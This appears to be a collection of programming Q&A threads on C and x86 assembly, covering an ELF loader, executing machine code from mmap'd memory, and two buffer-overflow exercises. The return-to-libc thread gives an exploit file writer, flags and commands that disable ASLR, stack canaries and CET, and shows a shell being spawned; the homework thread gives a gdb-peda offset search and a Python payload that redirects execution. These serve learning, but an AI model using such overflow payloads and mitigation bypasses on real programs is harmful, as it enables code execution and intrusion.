I am trying to implement my own binary loader for learning purposes, but cannot figure out the data segment.
section .data
helloworld db "hello world", 10
section .text
global _start
test: ;just for testing
ret
_start:
call test
mov rax, 1
mov rbx, 1
mov rcx, helloworld
mov rdx, 11
syscall
mov rax, 60
mov rdi, 0
syscall
This is my assembly program that I am trying to run. I compiled with nasm -f elf64 test.s -o test.o && ld test.o -o test.bin
My loader looks like this:
int main(int argc, char** argv) {
char* bin = argv[1];
struct ElfLib lib = read_elf(bin); //just reading the elf library into the default structures (Elf64_Ehdr, Elf64_Phdr, etc...)
unsigned char* exec = mmap(NULL, DEFAULT_MEM_SIZ, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); //allocating the virtual memory
memset(exec, 0, DEFAULT_MEM_SIZ);
for (int i = 0; i < lib.elf_header.e_phnum; i++) {
Elf64_Phdr phdr = lib.program_headers[i];
fseek(lib.execfile, phdr.p_offset, SEEK_SET);
switch (phdr.p_type) {
case PT_LOAD: {
//load the memory at the file offset into the virtual address of exec
fread(exec + phdr.p_vaddr, sizeof(unsigned char), phdr.p_memsz, lib.execfile);
break;
}
}
int flags = PROT_NONE;
#define HASFLAG(flag) if (phdr.p_flags & flag) flags|=flag
HASFLAG(PROT_EXEC); //execute flag on
HASFLAG(PROT_WRITE); //write flag on
HASFLAG(PROT_READ); //read flag on
mprotect(exec + phdr.p_vaddr, phdr.p_memsz, flags);
}
void (*ex)() = (void*)(exec + lib.elf_header.e_entry);
ex(); //call the _start function in the virtual memory
}
But when I run it, nothing gets printed.
I tried running it under GDB, and the program promptly exits after the exit syscall, with mov rax, 60 and mov rdi, 0, so I know the system call part works. I think that the issue is in the address of helloworld in the hello world program. GDB says that it is still under address 0x402000, which probably is not the same address under the virtual memory. Surprisingly, the test function is at 0x401000 with objdump, but at a completely different one when running with GDB, which does get called. Does anyone have an idea on how to go about implementing this?
I'm not sure how much this will help, but I'm running using x64 Linux under intel.
nasm -f elf64 test.s -o test.o
ld test.o -o test.bin
Unfortunately, I don't have NASM, but if I use GNU assembler instead of NASM, the lines above result in a position-dependent file.
This means that phdr.p_vaddr does not specify a value that is relative to the variable exec, but phdr.p_vaddr specifies an absolute address that must not be changed.
Assuming the symbol helloworld is located at the start of the data segment, the instruction mov rcx, helloworld will simply load the value phdr.p_vaddr into the register rcx - and not the value exec + phdr.p_vaddr.
However, because the address phdr.p_vaddr may already be used, you cannot simply load your code there!
The only possibility that you have if you want to load code from an already running program is so-called "position independent code" that can be loaded at different addresses in memory...
By the way:
64-bit x86 Linux does not take the parameters in rbx, rcx and rdx, but in rdi, rsi and rdx.
I tried to make a return to libc buffer overflow. I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.
system, exit address
/bin/sh address
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find MYSHELL address(for /bin/sh)
#include <stdio.h>
void main()
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
}
Terminal:
Terminal image after run retlib
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled with sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that when calling a function, stashes a copy of the return address away from the writable memory, which is checked against the return address when returning from the current function. This (and some other CET protections) can disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, having a different argv will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread#plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, saved ebp is 20 bytes away, and return address is 24 bytes away.
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$
Is it possible to store a function pointer contents in C. I know you can store every kind of pointer in a variable. But if I can "unwrap" an integer pointer (to an integer) or string pointer (to an unsigned char), wouldn't I be able to decode a function pointer.
To be more clear, I mean to store the machine code instructions in a variable.
You're missing an important fact: A function isn't a (first-class) object in C.
There are two basic types of pointers in C: Data pointers and function pointers. Both can be dereferenced using *.
The similarities end here. A data object has a stored value, so dereferencing a data pointer accesses this value:
int a = 5;
int *b = &a;
int c = *b; // 5
A function is just this, a function. You can call a function, so you can call the result of dereferencing a function pointer. It doesn't have a stored value:
int x(void) { return 1; }
int (*y)(void) = &x; // valid also without the address-of operator
// ...
int main(void)
{
int a = (*y)(); // valid also without explicit dereference like int a = y();
}
For ease of handling, C allows omitting the & operator when assigning a function to a function pointer and also omitting the explicit dereference when calling a function through a function pointer.
In short: using pointers doesn't change anything about the semantics of data objects vs functions.
Also note in this context that function and data pointers aren't compatible. You can't assign a function pointer to void *. It's even possible to have a platform where a function pointer has a different size from a data pointer.
In practice, on a platform where a function pointer has the same format as a data pointer, you could "convince" your compiler to access the actual binary code located there by casting your pointer to const char *. But be aware this is undefined behavior.
A pointer in C is the address of some object in memory. An int * is the address of an int, a pointer to a function is the address where the code of the function is stored in memory.
While you can read some bytes from the address of a function in memory, they are just bytes and nothing else. You need to know how to interpret these bytes in order to "store the machine code instructions in a variable". And the real problem here is to know where to stop, where the code of one function ends and the code of another function begins.
These things are not defined by the language and they depend on many factors: the processor architecture, the OS, the compiler, the compiler flags used to compile the code (for optimizations f.e.).
The real question here is: assuming you can "store the machine code instructions in a variable" how do you want to use it? It is just a sequence of bytes meaningless for most humans and it cannot be used to execute the function. If you are not writing a compiler, linker, emulator, operating system or something similar, there is nothing useful you can do with the machine code instruction of a function. (And if you are writing one of the above then you know the answer and you do not ask such questions on SO or somewhere else.)
Assume we are talking about von Neumann architecture.
Basically we have a single memory which contains both instructions and data. However modern OSes are able to control memory access permissions (read/write/execute).
Standardwise it is undefined behaviour to cast function pointer to data pointer. Although if we are talking say Linux, gcc and modern x86-64 CPU, you may do such a conversion, what you'll get will be a pointer into readonly executable segment of memory.
For instance take a look at this simple program:
#include <stdio.h>
int func() {
return 1;
}
int main() {
unsigned char * code = (void*)func;
printf("%02x\n%02x%02x%02x\n%02x%02x%02x%02x%02x\n%02x\n%02x\n",
*code,
*(code+1), *(code+2), *(code+3),
*(code+4), *(code+5), *(code+6), *(code+7), *(code+8),
*(code+9),
*(code+10));
}
Compiled with:
gcc -O0 -o tst tst.c
It's output on my machine is:
55 // push rbp
4889e5 // mov rsp, rbp
b801000000 // mov eax, 0x1
5d // pop rbp
c3 // ret
Which as you may see is indeed our function.
Since OS provides you with ability to mark memory executable you may in fact write your functions in runtime all you need is to generate current platform opcodes and mark memory executable. Which is exactly how JIT compilers work. For an excellent example of such a compiler take a look at LuaJIT.
The code here should be a skeleton to inject code into a program. But if you execute it in a SO such as Linux or Windows you will get an exception before the execution of the first instruction the fn_ptr points.
#include <stdio.h>
#include <malloc.h>
typedef int FN(void);
int main(void)
{
FN * fn_ptr;
char * x;
fn_ptr = malloc(10240);
x = (char *)fn_ptr;
// ... Insert code into x that points the same memory of fn_ptr;
x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
fn_ptr();
return 0;
}
If you execute this code using gdb, you obtain this result:
(gdb) l
2 #include <malloc.h>
3
4 typedef int FN(void);
5
6 int main(void)
7 {
8 FN * fn_ptr;
9 char * x;
10
11 fn_ptr = malloc(10240);
12 x = (char *)fn_ptr;
13
14 // ... Insert code into x that points the same memory of fn_ptr;
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
16 fn_ptr();
17
18 return 0;
19 }
(gdb) b 11
Breakpoint 1 at 0x400535: file p.c, line 11.
(gdb) r
Starting program: /home/sergio/a.out
Breakpoint 1, main () at p.c:11
11 fn_ptr = malloc(10240);
(gdb) p fn_ptr
$1 = (FN *) 0x7fffffffde30
(gdb) n
12 x = (char *)fn_ptr;
(gdb) n
15 x[0]='\xeb'; x[1]='\xfe'; // jmp $ that is like while(1)
(gdb) p x[0]
$3 = 0 '\000'
(gdb) n
16 fn_ptr();
(gdb) p x[0]
$5 = -21 '\353'
(gdb) p x[1]
$6 = -2 '\376'
(gdb) s
Program received signal SIGSEGV, Segmentation fault.
0x0000000000602010 in ?? ()
(gdb) where
#0 0x0000000000602010 in ?? ()
#1 0x0000000000400563 in main () at p.c:16
(gdb)
How you see the GDB signals a SIGSEGV, Segmentation fault at the address where fn_ptr points, although the instructions we have into the memory are valid instructions.
Note that the LM Code: EB FE is valid for Intel (or compatible) processor only. This LM Code correspond to the Assembly code: jmp $.
This is an example of use of function pointers where the LM code is copied into a memory area and executed.
The program below doesn't do nothing special! It runs the code that is in the array prg[][] copying it into a memory mapped area. It uses two functions pointer fnI_ptr and fnD_ptr both pointing the same memory area. The program copies the LM code in the memory alternatively one of the two code and then executes the "loaded" code.
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <malloc.h>
#include <sys/mman.h>
#include <stdint.h>
#include <inttypes.h>
typedef int FNi(int,int);
typedef double FNd(double,double);
const char prg[][250] = {
// int multiply(int x,int y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0x89,0x7d,0xfc, // mov %edi,-0x4(%rbp)
0x89,0x75,0xf8, // mov %esi,-0x8(%rbp)
0x8B,0x45,0xfc, // mov -0x4(%rbp),%eax
0x0f,0xaf,0x45,0xf8, // imul -0x8(%rbp),%eax
0x5d, // pop %rbp
0xc3 // retq
},
// double multiply(double x,double y)
{
0x55, // push %rbp
0x48,0x89,0xe5, // mov %rsp,%rbp
0xf2,0x0f,0x11,0x45,0xf8, // movsd %xmm0,-0x8(%rbp)
0xf2,0x0f,0x11,0x4d,0xf0, // movsd %xmm1,-0x10(%rbp)
0xf2,0x0f,0x10,0x45,0xf8, // movsd -0x8(%rbp),%xmm0
0xf2,0x0f,0x59,0x45,0xf0, // mulsd -0x10(%rbp),%xmm0
0xf2,0x0f,0x11,0x45,0xe8, // movsd %xmm0,-0x18(%rbp)
0x48,0x8b,0x45,0xe8, // mov -0x18(%rbp),%rax
0x48,0x89,0x45,0xe8, // mov %rax,-0x18(%rbp)
0xf2,0x0f,0x10,0x45,0xe8, // movsd -0x18(%rbp),%xmm0
0x5d, // pop %rbp
0xc3 // retq
}
};
int main(void)
{
#define FMT "0x%016"PRIX64
int ret=0;
FNi * fnI_ptr=NULL;
FNd * fnD_ptr=NULL;
void * x=NULL;
//uint64_t p = PAGE(K), l = p*4; //Max memory to use!
uint64_t p = 0, l = 0, line=0; //Max memory to use!
do {
p = getpagesize();line = __LINE__;
if (!p) {
ret=line;
break;
}
l=p*2;
printf("Mem page size = "FMT"\n",p);
printf("Mem alloc size = "FMT"\n\n",l);
x = mmap(NULL, l, PROT_EXEC | PROT_READ | PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);line = __LINE__;
if (x==MAP_FAILED) {
x=NULL;
ret=line;
break;
}
//Prepares function-pointers. They point the same memory! :)
fnI_ptr=(FNi *)x;
fnD_ptr=(FNd *)x;
printf("from x="FMT" to "FMT"\n\n",(int64_t)x,(int64_t)x + l);
// Calling the functions coded into the array prg
puts("Copying prg[0]");
// It injects the function prg[0]
memcpy(x,prg[0],sizeof(prg[0]));
// It executes the injected code
printf("executing int-mul = %d\n",fnI_ptr(10,20));
puts("--------------------------");
puts("Copying prg[1]");
// It injects the function prg[1]
memcpy(x,prg[1],sizeof(prg[1]));
//Prepares function pointers.
// It executes the injected code
printf("executing dbl-mul = %f\n\n",fnD_ptr(12.3,3.21));
} while(0); // Fake loop to be breaked when an error occurs!
if (x!=NULL)
munmap(x,l);
if (ret) {
printf("[line"
"=%d] Error %d - %s\n",ret,errno,strerror(errno));
}
return errno;
}
In prg[][] there're two LM functions:
The first multplies two integer values and returns an integer value as result
The second multiplies two double-precision values and returns a double precision value as result.
I don't discuss about portability. The code into prg[][] was obtained by objdump -S prgname > prgname.s of an object obtained compiling with gcc ( gcc (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4 ) without optimization the following code:
int multiply(int a, int b)
{
return a*b;
}
double dMultiply(double a, double b)
{
return a*b;
}
The above code has been compiled on a PC with an Intel I3 CPU (64 bit) and SO Linux (3.13.0-116-generic #163-Ubuntu SMP Fri Mar 31 14:13:22 UTC 2017 x86_64).
I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!
I'm trying to do the following for the sake of practice in NASM:
1)Read a string from command-line in C
2)Pass that string to a NASM function which takes the string as its first parameter
3)Return that exact string from NASM function
prefix.asm:
;nasm -f elf32 prefix.asm -o prefix.o
segment .bss
pre resb 256
segment .text
global prefix
prefix:
push ebp ;save the old base pointer value
mov ebp,esp ;base pointer <- stack pointer
mov eax,[ebp+8] ;function argument
add esp, 4
pop ebp
ret
prefix c:
//nasm -f elf32 prefix.asm -o prefix.o
//gcc prefix.c prefix.o -o prefix -m32
#include <stdio.h>
#include <string.h>
char* prefix(char *str);
int main(void)
{
char str[256];
char* pre;
int a;
printf("Enter string: ");
scanf("%s" , str) ;
pre = prefix(str);
printf("Prefix array: %s\n", pre);
return 0;
}
After I run(it compiles w/o any problem) and supply my string to the program I get a Segmentation fault (core dumped) error.
First try to write a C program to implement char* prefix(char *str), disassemble it and understand it.
Problem 1: the add esp, 4 should be deleted. A function should preserve the stack pointer. I.e. the esp should be the same before the first instruction and before the return instruction. Your assembly code increases esp by 4.
Problem 2: Don't name your .asm and .c to be the same. Use different names.